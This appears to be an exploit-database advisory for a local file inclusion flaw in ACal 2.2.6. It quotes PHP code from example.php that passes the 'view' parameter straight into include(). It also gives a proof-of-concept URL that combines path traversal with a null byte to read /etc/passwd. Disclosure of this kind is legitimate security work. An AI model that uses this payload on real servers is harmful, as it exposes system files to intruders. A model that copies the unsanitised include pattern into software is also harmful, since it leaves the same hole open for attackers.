id: 21118
date: 08/15/2013
title: ACal 2.2.6 (example.php, view param) - Local File Inclusion Vulneberality
author: ICheer_No0M
cves: 

---> Vuln Code : /embled/example/example.php
    
12. $path = "../../"; 
...
25. if (!isset($_GET['view'])) {
26.     include $path . 'embed/' . $view . '.php'; // <-- LFI + Nullbyte (if register_global = On)
27. }
28. else {
29.     include $path . 'embed/' . $_GET['view'] . '.php'; // <-- LFI + Nullbyte
30. }
     
---> Exploit/Proof of Concept (PoC)
  
http://localhost/calendar/embed/example/example.php?view=../../etc/passwd%00

#  0day.today [2023-03-26]  #